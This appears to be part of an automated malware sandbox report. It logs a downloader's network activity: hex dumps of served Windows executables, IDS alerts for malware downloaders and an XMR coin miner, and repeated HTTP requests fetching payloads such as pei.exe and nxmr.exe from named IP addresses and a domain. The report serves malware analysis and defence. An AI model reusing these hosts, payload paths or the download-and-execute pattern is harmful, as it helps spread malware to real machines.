10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c 24 00 00 8c 00 00 00 00 40 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 98 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 23 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 04 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 7a 0c 00 00 00 10 00 00 00 0e 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 34 0a 00 00 00 20 00 00 00 0c 00 00 00 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 8c 03 00 00 00 30 00 00 00 02 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 40 00 00 00 04 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 fe 01 00 00 00 50 00 00 00 02 00 00 00 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 26 Oct 2024 05:26:29 GMTContent-Type: application/octet-streamContent-Length: 85504Last-Modified: Thu, 10 Oct 2024 07:41:50 GMTConnection: keep-aliveETag: "6707853e-14e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6d bb 70 6a 29 da 1e 39 29 da 1e 39 29 da 1e 39 20 a2 94 39 2e da 1e 39 51 a8 1f 38 2b da 1e 39 ea d5 43 39 2b da 1e 39 ea d5 41 39 28 da 1e 39 ea d5 11 39 2b da 1e 39 0e 1c 73 39 2d da 1e 39 29 da 1f 39 95 da 1e 39 0e 1c 65 39 3c da 1e 39 20 a2 9d 39 2d da 1e 39 20 a2 9a 39 35 da 1e 39 20 a2 8f 39 28 da 1e 39 52 69 63 68 29 da 1e 39 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 a4 84 07 67 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 ee 00 00 00 70 00 00 00 00 00 00 40 79 00 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 70 01 00 00 04 00 00 00 00 00 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 7c 30 01 00 04 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 10 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 86 ed 00 00 00 10 00 00 00 ee 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 f2 3f 00 00 00 00 01 00 00 40 00 00 00 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 90 2e 00 00 00 40 01 00 00 1c 00 00 00 32 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 26 Oct 2024 05:27:15 GMTContent-Type: application/octet-streamContent-Length: 5827584Last-Modified: Fri, 27 Sep 2024 20:03:46 GMTConnection: keep-aliveETag: "66f70fa2-58ec00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0b 00 b7 01 f7 66 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 02 26 00 94 01 00 00 e8 58 00 00 1e 00 00 b0 14 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 70 59 00 00 04 00 00 91 87 59 00 02 00 60 01 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 20 59 00 34 0a 00 00 00 50 59 00 80 03 00 00 00 d0 58 00 58 11 00 00 00 00 00 00 00 00 00 00 00 60 59 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 b7 58 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8c 22 59 00 50 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 50 93 01 00 00 10 00 00 00 94 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 60 2e 64 61 74 61 00 00 00 c0 de 56 00 00 b0 01 00 00 e0 56 00 00 98 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 00 00 f0 39 00 00 00 90 58 00 00 3a 00 00 00 78 58 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 70 64 61 74 61 00 00 58 11 00 00 00 d0 58 00 00 12 00 00 00 b2 58 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 78 64 61 74 61 00 00 f4 0e 00 00 00 f0 58 00 00 10 00 00 00 c4 58 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 62 73 73 00 00 00 00 80 1c 00 00 00 00 59 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 69 64 61 74 61 00 00 34 0a 00 00 00 20 59 00 00 0c 00 00 00 d4 58 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 43 52 54 00 00 00 00 60 00 00 00 00 30 59 00 00 02 00 00 00 e0 58 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 40 59 00 00 02 00 00 00 e2 58 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 80 03 00 00 00 50 59 00 00 04 00 00 00 e4 58 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 30 03 00 00 00 60 59 00 00 04 00 00 00 e8 58 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: Joe Sandbox View

IP Address: 185.215.113.66 185.215.113.66

Source: Joe Sandbox View	ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View	ASN Name: ISPETCUZ ISPETCUZ
Source: Joe Sandbox View	ASN Name: ROSTELECOM-ASRU ROSTELECOM-ASRU

Source: Network traffic	Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.7:49714 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49810 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49857 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49795 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49732 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49906 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49950 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49982 -> 185.215.113.84:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49985 -> 91.202.233.141:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49984 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49988 -> 91.202.233.141:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49989 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49991 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49993 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49994 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49996 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:50000 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49998 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:50002 -> 91.202.233.141:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:50005 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2826930 - Severity 2 - ETPRO COINMINER XMR CoinMiner Usage : 192.168.2.7:49999 -> 185.215.113.66:5152

Source: global traffic	HTTP traffic detected: GET /pei.exe HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.215.113.66Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /newtpp.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Host: twizt.net
Source: global traffic	HTTP traffic detected: GET /peinstall.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: twizt.net
Source: global traffic	HTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /nxmr.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Host: 185.215.113.84
Source: global traffic	HTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /dwntbl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
Source: global traffic	HTTP traffic detected: GET /ALLBSTATAASASD HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 91.202.233.141
Source: global traffic	HTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
Source: global traffic	HTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
Source: global traffic	HTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
Source: global traffic	HTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
Source: global traffic	HTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
Source: global traffic	HTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66

Source: unknown	TCP traffic detected without corresponding DNS query: 94.230.237.65
Source: unknown	TCP traffic detected without corresponding DNS query: 94.230.237.65
Source: unknown	TCP traffic detected without corresponding DNS query: 94.230.237.65
Source: unknown	TCP traffic detected without corresponding DNS query: 94.230.237.65
Source: unknown	TCP traffic detected without corresponding DNS query: 94.230.237.65
Source: unknown	TCP traffic detected without corresponding DNS query: 94.230.237.65
Source: unknown	TCP traffic detected without corresponding DNS query: 94.230.237.65
Source: unknown	TCP traffic detected without corresponding DNS query: 94.230.237.65
Source: unknown	TCP traffic detected without corresponding DNS query: 94.230.237.65
Source: unknown	TCP traffic detected without corresponding DNS query: 94.230.237.65
Source: unknown	TCP traffic detected without corresponding DNS query: 94.230.237.65
Source: unknown	TCP traffic detected without corresponding DNS query: 94.230.237.65
Source: unknown	TCP traffic detected without corresponding DNS query: 178.71.163.141
Source: unknown	TCP traffic detected without corresponding DNS query: 178.71.163.141
Source: unknown	TCP traffic detected without corresponding DNS query: 178.71.163.141
Source: unknown	TCP traffic detected without corresponding DNS query: 178.71.163.141
Source: unknown	TCP traffic detected without corresponding DNS query: 178.71.163.141
Source: unknown	TCP traffic detected without corresponding DNS query: 178.71.163.141
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.84
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.84
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.84
Source: unknown	TCP traffic detected without corresponding DNS query: 213.230.124.7
Source: unknown	TCP traffic detected without corresponding DNS query: 213.230.124.7
Source: unknown	TCP traffic detected without corresponding DNS query: 213.230.124.7
Source: unknown	TCP traffic detected without corresponding DNS query: 213.230.124.7
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.84
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.84
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.84
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.84
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.84
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.84
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.84
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.84
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.84
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.84
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.84
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.84
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.84
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.84
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.84
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.84
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.84
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.84
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.84
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.84
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.84
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.84
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.84
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.84
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.84

Source: C:\Users\user\Desktop\T52Z708x2p.exe

Code function: 1_2_00000001400A2000 EntryPoint,GetFileAttributesW,LoadLibraryExA,GetTempFileNameW,URLDownloadToFileW,DeleteFileW,CreateProcessW,

1_2_00000001400A2000

Source: global traffic	HTTP traffic detected: GET /pei.exe HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.215.113.66Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /newtpp.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Host: twizt.net
Source: global traffic	HTTP traffic detected: GET /peinstall.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: twizt.net
Source: global traffic	HTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /nxmr.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Host: 185.215.113.84
Source: global traffic	HTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /dwntbl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
